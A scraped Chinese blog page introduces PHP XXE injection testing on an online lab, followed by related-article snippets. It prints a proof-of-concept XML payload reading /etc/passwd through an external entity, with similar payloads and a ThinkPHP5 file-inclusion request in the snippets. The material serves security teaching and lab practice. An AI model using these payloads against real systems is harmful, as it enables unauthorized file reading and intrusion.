PHP XXE漏洞测试实践

最新推荐文章于 2024-07-30 21:39:07 发布
最新推荐文章于 2024-07-30 21:39:07 发布
阅读量4.5k 收藏 9
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ambulong/article/details/80573061
版权

XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。

当允许引用外部实体时,攻击者可通过构造恶意的XML内容,进行读取任意文件、执行系统命令、探测内网端口、攻击内网网站等操作。

VulnSpy提供了PHP XXE的在线演示实验,我们可以直接在线对XXE漏洞进行测试。

演示地址:XML External Entity (XXE) - https://www.vulnspy.com/?u=phpaudit-xxe/xml_external_entity_(xxe)

在XXE的演示示例中演示了3种不同函数/类导致的XXE漏洞,同时提供了Blind XXE的环境。


打开测试文件后默认内容为简单的任意文件读取POC:

<?xml version="1.0"?>
<!DOCTYPE ANY [
    <!ENTITY content SYSTEM "file:///etc/passwd">
]>
<note>
    <name>&content;</name>
</note>

漏洞利用


更多的利用姿势可以参考:

未知攻焉知防——XXE漏洞攻防- 博客- 腾讯安全应急响应中心 - https://security.tencent.com/index.php/blog/msg/69


Ambulong
关注
PHP代码审计之XXE(XML外部实体注入)
qq_22132931的博客
12-08 832
PHP代码审计之XXE(XML外部实体注入)
漏洞挖掘】——25、XXE靶机实践测试
Fly_鹏程万里
03-08 8564
Haboob团队根据https://www.exploit-db.com/docs/45374发表的论文"XML外部实体注入-解释和利用"制作了这个虚拟机以利用私有网络漏洞,我们希望你喜欢这个挑战!
xxe漏洞php代码审计1
m0_55772907的博客
05-01 652
(1)原理 XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害 xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件 (2)基础知识 XML 被设计为传输和存储数据,其焦点是数据的内容HTML 被设计用来显示数据,其焦点是数据的外观...
PHP环境 XML外部实体注入漏洞XXE
EC_Carrot的博客
07-19 1010
漏洞简介 libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡,这里用libxml2.8.0版本编译进PHP来复现。 漏洞复现 Simple XXE Payload: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <root> &lt
XXE-lab-master靶场:PHP_xxe
最新发布
weixin_68416970的博客
07-30 877
XXE-lab-master:PHP_xxe的练习教程
php xxe注入,php xxe 攻击
weixin_42469083的博客
03-10 248
php entites:预定义的:&<%一般实体:,调用方式:在&general;,不能包含在属性。参数实体:,调用方式,立即使用:%param;一般实体和参数实体都能包含内部资源(DTD) 和外部资源危害:(1)本地文件读取]>&xxe;(2)dos攻击(访问/dev/zero),嵌套解释实体]>&lol9;(3)局域网内资源(4)端口扫描(...
php xxe注入,XXE的原理利用方式及修复
weixin_26750831的博客
03-10 1172
注:本文仅供参考学习XXE定义:XXE,"xml external entity injection",即"xml外部实体注入漏洞"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题。XXE原理:服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE(XML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞。XML是一种标记语言,常用于数据交换,而...对于初学者,通过实践靶场可以更好地理解和掌握XXE漏洞的相关知识。
WEB安全之XXE实体注入漏洞.pdf
12-12
XXE漏洞详解】 XML(eXtensible Markup Language)是一种用于存储和传输数据的标记语言,它允许自定义标记并具有结构化的特点。在Web应用程序,XML常用于数据交换和配置。然而,XML的这种灵活性也引入了安全...
靶机实战bwapp亲测xxe漏洞攻击及自动化XXE注射工具分析利用
代码讲故事
02-04 484
靶机实战bwapp亲测xxe漏洞攻击及自动化XXE注射工具分析利用
DVWA靶场,集成了owasp top 10漏洞
03-28
通过在DVWA实践,用户能够深入理解漏洞的原理,学习如何识别它们,以及如何利用这些漏洞,进一步提高网络安全防护能力。 OWASP Top 10漏洞包括: 1. A1:注入攻击(Injection) - 这种攻击发生在用户输入的数据...
【渗透测试XXE(外部实体注入):PHP_XXE解题简记
weixin_53972936的博客
10-26 1620
XXE漏洞发生在应用程序解析XML输入时,并没有禁止外部实体的加载,当允许引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。
buuctf-Real-[PHP-XXE]
weixin_46079186的博客
05-09 1301
题目地址 dom.php、SimpleXMLElement.php、simplexml_load_string.php均可触发XXE漏洞 用burp抓包,在后方修改加入payload payload: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> &
thinkphp5的漏洞
https://www.cnblogs.com/zpchcbd/
04-10 1342
文件包含: http://ip/index.php?s=captcha&m=1 post提交: _method=__construct&filter[]=think__include_file&get[]=/home/www/test3/public/1.txt&method=get&server[]= 代码执行漏洞: http://bugbank.51vi...
[Vulhub] PHP环境 XML外部实体注入漏洞XXE
weixin_45605352的博客
05-07 3560
0x01 预备知识 XXE是什么? XXE(XML External Entity Injection)也就是XML外部实体注入,XXE漏洞发生在应用程序解析XML输入时,XML文件的解析依赖libxml 库,而 libxml2.9 以前的版本默认支持并开启了对外部实体的引用,服务端解析用户提交的XML文件时,未对XML文件引用的外部实体(含外部一般实体和外部参数实体)做合适的处理,并且实体的URL支持 file:// 和 ftp:// 等协议,导致可加载恶意外部文件和代码,造成 任意文件读取、命令执行、
Web安全 XXE漏洞测试利用.(读取服务器的任何文件 和 收集服务器的内网信息.)
网络安全领域___专研者.
03-08 6577
XXE漏洞全称(XML External Entity Injection),即XML外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成:文件读取、命令执行、内网端口扫描、攻击内网网站,DOS攻击 等危害.(xxe漏洞触发的点往往是可以上传xml文件的位置的,没有对上传的xml文件进行过滤,导致可上传恶意xml文件.)
php代码审计之xxe
qq_42307546的博客
06-04 601
xml
XXE blind 简单poc & 读文件
3569
03-27 3191
原理简介: https://blog.csdn.net/u011721501/article/details/43775691 首先你要确定是xml格式的数据,content-type是xml,PHP和JAVA利用有点不一样 PHP 利用方式 读取文件POC 利用: 自己vps放置 xxe.xml <!ENTITY % payload SYSTEM "php://fil...
XXE-Lab for PHP
m0_66299232的博客
09-10 714
2.将PHPStudy的间件与版本信息调制为。1.在登录界面输入账号密码并抓取数据包....3.使用PHP伪协议读取文件....4.探测内网存活主机与端口...2.尝试读取本地文件....1.将靶场进行下载....访问以下地址开始练习...
XXE漏洞深度解析与实战演练
本文档详细介绍了XXE(XML External Entity)漏洞的概念、危害、检测方法、利用技巧以及修复策略,并提供了多个实际案例进行演示。XXE漏洞主要发生在使用XML解析器处理用户输入的场景,攻击者可以通过构造恶意的XML...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值